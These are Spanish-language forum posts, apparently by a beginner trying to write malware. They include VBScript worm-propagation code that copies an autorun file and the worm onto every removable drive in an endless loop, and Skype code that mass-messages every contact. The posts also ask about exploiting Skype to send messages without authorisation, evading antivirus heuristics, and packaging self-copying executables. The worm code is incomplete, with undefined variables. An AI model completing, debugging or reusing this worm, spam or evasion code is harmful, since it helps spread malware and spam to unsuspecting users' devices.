Mensajes

Hola tengo una duda sobre esta botnet que es lo que hace exactamente se esparce en dispositivos que son vulnerables o en dispositivos que utilizan creedenciales por defecto ¿? como puede ser login por defecto. No estoy seguro pero yo pensaba que si uno tenía acceso al router no podía estar en riesgo pero supongo será solo con algunos dispositivos no todos.

un lenguaje de programación si no es portable es una desventaja. pienso tal vez me equivoque.

Hola estoy siguiendo el manual de octalh para crear un gusano, referencia:

http://foro.elhacker.net/analisis_y_diseno_de_malware/taller_crea_tu_primer_w0rm_gusano-t191563.0.html

El autorun lo hace pero se queda todo el rato haciendolo. También estoy intentando aprender a hacer uno con shorcut's pero no se como funcionan. Mi pregunta es porque no finaliza de crear de el autorun. Posdata: creo porque el loop hace que nunca finalice (cuando digo no funcione cuando conecto el usb no arranca el gusano supongo que sera porque debo ejecutar algo no sé exactamente el que)

Es decir se me queda todo el rato con el usb parpadeando y pienso que será por el loop. Habría una forma de evitar que cuando se haya copiado haga break y se salga del loop?

Y lo segundo es cuando se copia el autorun, quito el gusano y tal, y pongo otra vez de nuevo el usb el gusano no se arranca en mi ordenador¿Puede que el autorun este dañado pienso? Tenga que modificarlo de alguna manera.

Código [Seleccionar] Expandir

do ' inicia loop infinito
Set oFS = Wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'declaramos todos los srivers
For Each Drive in oDrives 'por cada driver
   If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
       If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
           If fso.FileExists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
              set cFile = fso.GetFile (Drive.DriveLetter + autorunusb)'tomalo y
              cFile.attributes = 0 ' quitale los atributos
              fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true'despues copialo
          else' de lo contrario
     fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true' copialo
  End if
fso.CopyFile w0rmpatch, Drive.DriveLetter & w0rmusb , true' copia el gusano a la unidad
End If
End If
Next
loop
end sub

perdonar esque soy muy principiante acabo de interesarme por c/c++ por su portabilidad, y tambien no tenía claro la diferencia entre ellos, pero claro como dice muy claro el troyano es un tipo de virus igual que el gusano lo unico que hace el troyano es abrir una puerta trasera pero todos son una misma cosa un virus. Eso sí no se porque la gente prefiere hacer los gusanos en visual basic cuando c/c++ es portable a otras plataformas mientras visual basic no. Pero eso ya es otro tema, gracias!

Siempre se ha diferenciado perfectamente gusanos,viruses,troyanos y botnets. Pero hoy en día nos encontramos con híbridos entonces que está pasando con el malware esta mutando como las películas de ciencia ficción o es mejor seguir desarrollando lo de siempre gusanos,viruses,troyanos y botnets. Es decir, seguirán funcionando por separado o podría perfectamente darse el caso de que un gusano incluyera una pequeña backdoor por ejemplo para que funcionará al mismo tiempo como troyano como se da el caso de h-worm houdini que yo lo veo más como un troyano pero parece ser un gusano nosé. Pensaba que cada cosa era diferente y no iba mezclada una con la otra. Luego también preguntar por el tiempo de vida de los gusanos ya que los gusanos pueden cambiar su estructura y hacer copias diferentes de sí misma pero manteniendo su funcionalidad. Entonces con el tema de las proactivas los gusanos no tendrían mucho tiempo de vida o al final detectarían mediante proactivas osea que ya no son útiles como malware.

Esto lo utilizan mucho los gusanos. crear un gusano en VBS polimórfico (es decir, que cada copia del gusano sea diferente y cambie su estructura, manteniendo su funcionalidad) es relativamente facil, aunque con el tema de las proactivas lo llevan dificil

Hola estoy intentando mandar mensajes masivos pero nunca llegan a todos los contactos.

Código [Seleccionar] Expandir

Public Class Form1
   Public WithEvents refSkype As New SKYPE4COMLib.Skype
   Public Mag As String = "hola"
   Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
       Dim skype As Object
       skype = CreateObject("skype4COM.skype", "")
       skype.Client.Start()
       skype.Attach()
       For Each User In skype.Friends
           On Error Resume Next
           skype.SendMessage(User.Handle, Mag)
       Next
   End Sub
End Class


Namespace SKYPE4COMLib
   Public Class Skype
       Function ActiveCalls() As Object
           Throw New NotImplementedException
       End Function

       Function HardwiredGroups() As Object
           Throw New NotImplementedException
       End Function

       Sub PlaceCall(ByVal p1 As Object)
           Throw New NotImplementedException
       End Sub

       Sub SendMessage(ByVal p1 As Object, ByVal p2 As String)
           Throw New NotImplementedException
       End Sub

       Function User(ByVal p1 As Object) As Object
           Throw New NotImplementedException
       End Function

   End Class
End Namespace
Si es posible, se podría buscar un exploit en skype y mandaría los mensajes automaticamente sin pedir autorización como aplicacion de terceros. Simplemente con fines educativos por supuesto!

Para empezar, IExpress genera ejecutables y funciona como un generador de instalaciones. Puede juntar muchos archivos. No comprime en RAR o ZIP o cualquiera.

Hasta que el ejecutable no haya sido descomprimido, no va a poder ejecutarse... está en un instalador. Lo que estás preguntando es, esencialmente: Si un programa no está instalado / descomprimido - ¿Puede funcionar sin problemas?

iexpress genera ejecutables pero el pack se puede descomprimir con winrar. estaba preguntando si mi programa esta dentro del fichero que obtengo con iexpress y este fichero se copia en otro sitio podrá realizar el copiado¿? es decir el fichero se esta copiando a sí mismo en otra parte del sistema.

Hola hay alguna manera de proteger mis aplicaciones de las proactivas cuando me refiero a proteger me refiero a proteger mi código para evitar que la incluyan en su base de datos ya que en principio no son aplicaciones dañinas simplemente aplicaciones que utilizan procedimientos para como puede ser createremotethread etc...

Hola tengo una duda sobre iexpress ya que iexpress permite juntar dos archivos. Pero tengo una duda si iexpress genera un ejecutable que obviamente facilmente uno puede descomprimir con winrar. Pero si uno de esos ficheros hace funciones de copiado por ejemplo mi fichero se copia en otro directorio. Mi fichero se podrá copiar si esta comprimido con iexpress?